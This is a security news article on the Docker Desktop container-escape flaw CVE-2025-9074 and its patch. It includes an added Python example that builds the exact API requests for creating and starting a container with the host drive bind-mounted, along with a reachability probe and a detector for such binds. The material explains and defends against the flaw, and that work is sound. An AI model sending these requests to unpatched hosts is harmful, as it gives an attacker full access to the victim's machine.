Docker Patches CVE-2025-9074 Critical Container Escape Vulnerability (CVSS 9.3)


Docker has rolled out security updates to fix a critical vulnerability (CVE-2025-9074) in Docker Desktop for Windows and macOS. This flaw, rated 9.3 out of 10 on the CVSS scale, could allow attackers to escape container isolation and gain host-level access. The issue has been patched in Docker Desktop version 4.44.3.

According to Docker’s security advisory, a malicious container could exploit the bug to talk to the Docker Engine API and create additional containers without the Docker socket ever being mounted into it. Because the newly created container can bind-mount host paths, this gives unauthorized access to sensitive files on the host machine. Docker also confirmed that Enhanced Container Isolation (ECI) does not mitigate this vulnerability.

Technical Details

Security researcher Felix Boulet revealed that the weakness arises because containers can connect to the Docker Engine API on the Docker Desktop VM’s internal network (192.168.65[.]7:2375) without authentication. No elevated privileges are needed inside the attacking container: any container that can make an HTTP request can ask the engine to create a new container that bind-mounts the host’s C:\ drive, and from there gain complete control over the underlying host.

In a proof-of-concept (PoC) exploit, Boulet demonstrated that:

  1. A plain HTTP request from any container, with no credentials, is enough to reach the engine.
  2. The attacker sends a POST request with a JSON payload to /containers/create, binding the host’s C:\ drive into the new container (Binds entry /mnt/host/c:/host_root).
  3. Starting that container with POST /containers/{id}/start lets the attacker read or modify any file under /host_root, i.e. anywhere on the host drive.
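The two API calls above, written out as the exact bytes a container (or an SSRF relay) would have to emit, plus a non-destructive reachability probe and a detection check for containers that were created with a host-root bind. This is an added example, not Boulet’s or Docker’s code. The host, port and bind string come from the article; the image name, the container command and the drive-root regex used by the detector are assumptions, and the inspect records are constructed sample data.

```python
"""Worked example for the CVE-2025-9074 request flow (added here; not the PoC author's code).

From the article: Engine API at 192.168.65.7:2375, bind "/mnt/host/c:/host_root",
POST /containers/create followed by POST /containers/{id}/start.
Assumed (not on the page): image "alpine", the keep-alive command, and the
drive-root heuristic in find_host_root_binds(). Nothing touches the network
unless probe_engine_api() is called explicitly.
"""
import http.client
import json
import re
import socket

ENGINE_HOST = "192.168.65.7"                # from the article
ENGINE_PORT = 2375                          # from the article
HOST_ROOT_BIND = "/mnt/host/c:/host_root"   # from the article (WSL2 path of the host C: drive)


def build_create_payload(bind=HOST_ROOT_BIND, image="alpine"):
    """JSON body for POST /containers/create. Only HostConfig.Binds is from the article;
    Image and Cmd are placeholders (assumed)."""
    return {
        "Image": image,
        "Cmd": ["sleep", "infinity"],        # keep the container alive so /host_root stays usable
        "HostConfig": {"Binds": [bind]},     # the escape: host drive root mounted into the container
    }


def render_request(method, path, body=None, host=ENGINE_HOST, port=ENGINE_PORT):
    """Serialize an HTTP/1.1 request as bytes. Both PoC steps are POSTs, which is why a
    GET-only SSRF primitive cannot reproduce them."""
    payload = json.dumps(body).encode() if body is not None else b""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}:{port}"]
    if payload:
        lines.append("Content-Type: application/json")
    lines.append(f"Content-Length: {len(payload)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + payload


def poc_requests(container_id="<id>"):
    """The two requests described in the article, in order (create, then start)."""
    return [
        render_request("POST", "/containers/create", build_create_payload()),
        render_request("POST", f"/containers/{container_id}/start"),
    ]


def probe_engine_api(host=ENGINE_HOST, port=ENGINE_PORT, timeout=2.0):
    """Safe check from inside a container: is the Engine API reachable without auth?
    GET /_ping answers 200 "OK" on an exposed daemon. Returns (reachable, detail)."""
    try:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        conn.request("GET", "/_ping")
        resp = conn.getresponse()
        return resp.status == 200, f"HTTP {resp.status} {resp.read(64)!r}"
    except (OSError, socket.timeout, http.client.HTTPException) as exc:
        return False, repr(exc)


# Heuristic (assumed): a bind whose source is a whole host drive under Docker Desktop's
# /mnt/host/<letter> mount point, or the VM root "/" itself, is a host-root mount.
DRIVE_ROOT_RE = re.compile(r"^(/|/mnt/host/[A-Za-z]/?)$")


def find_host_root_binds(inspect_records):
    """Detection: scan `docker inspect`-style records and return (Id, bind) pairs whose
    bind source is a host drive root. Narrow binds such as /mnt/host/c/Users/x are ignored."""
    hits = []
    for rec in inspect_records:
        for bind in rec.get("HostConfig", {}).get("Binds") or []:
            source = bind.split(":", 1)[0]
            if DRIVE_ROOT_RE.match(source):
                hits.append((rec["Id"], bind))
    return hits


SAMPLE_INSPECT = [  # constructed sample data, not real inspect output
    {"Id": "aaa111", "HostConfig": {"Binds": ["/mnt/host/c:/host_root"]}},
    {"Id": "bbb222", "HostConfig": {"Binds": ["/mnt/host/c/Users/dev/app:/app"]}},
    {"Id": "ccc333", "HostConfig": {"Binds": None}},
    {"Id": "ddd444", "HostConfig": {"Binds": ["/:/host_root:ro"]}},
]


if __name__ == "__main__":
    for req in poc_requests("abc"):
        print(req.decode(errors="replace"))
    print("host-root binds:", find_host_root_binds(SAMPLE_INSPECT))
    # Uncomment inside a Docker Desktop container to test exposure (patched versions refuse):
    # print(probe_engine_api())
```

On a patched Docker Desktop the probe should fail to connect; on a vulnerable one it returns `(True, "HTTP 200 b'OK'")`, which is a far safer indicator than actually creating a container. The detector is what you would run over `docker inspect $(docker ps -aq)` after the fact to look for containers that were created with a drive-root bind.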

Boulet described the bug as “a simple oversight”, explaining that Docker’s internal HTTP API was exposed without proper authentication or access controls.

Further research by Philippe Dugre (zer0x64) of PVOTAL Technologies confirmed that on Windows, attackers could exploit the flaw to:

  • Mount the entire filesystem as administrator.
  • Steal sensitive data.
  • Replace system DLLs to escalate privileges to host-level administrator.

On macOS, the risk is lower because the Docker Desktop app runs under the operating system’s file-access restrictions: an attempt to bind-mount a host directory prompts the user for approval, and by default Docker does not have full filesystem access. Still, an attacker could modify Docker’s own configuration or backdoor other containers without any user consent.

Linux users remain unaffected. On Linux the Docker Engine runs natively and is reached over a Unix domain socket (/var/run/docker.sock) rather than the TCP endpoint exposed inside Docker Desktop’s VM, so a container has no network path to the engine unless the socket is deliberately mounted into it.

Attack Vectors

The most straightforward method of exploitation is a malicious container deployed by the threat actor. However, Server-Side Request Forgery (SSRF) in an application running inside a container could also be used to relay requests to the exposed engine endpoint. Most SSRF flaws only allow GET requests, which against this API would be limited to enumerating containers and images; the create and start calls used in the PoC are POST requests, so the rarer SSRF cases that allow POST, PATCH, or DELETE requests raise the impact to a full escape.

Security Recommendation

Users of Docker Desktop on Windows and macOS are strongly advised to upgrade to version 4.44.3 or later immediately to eliminate the risk.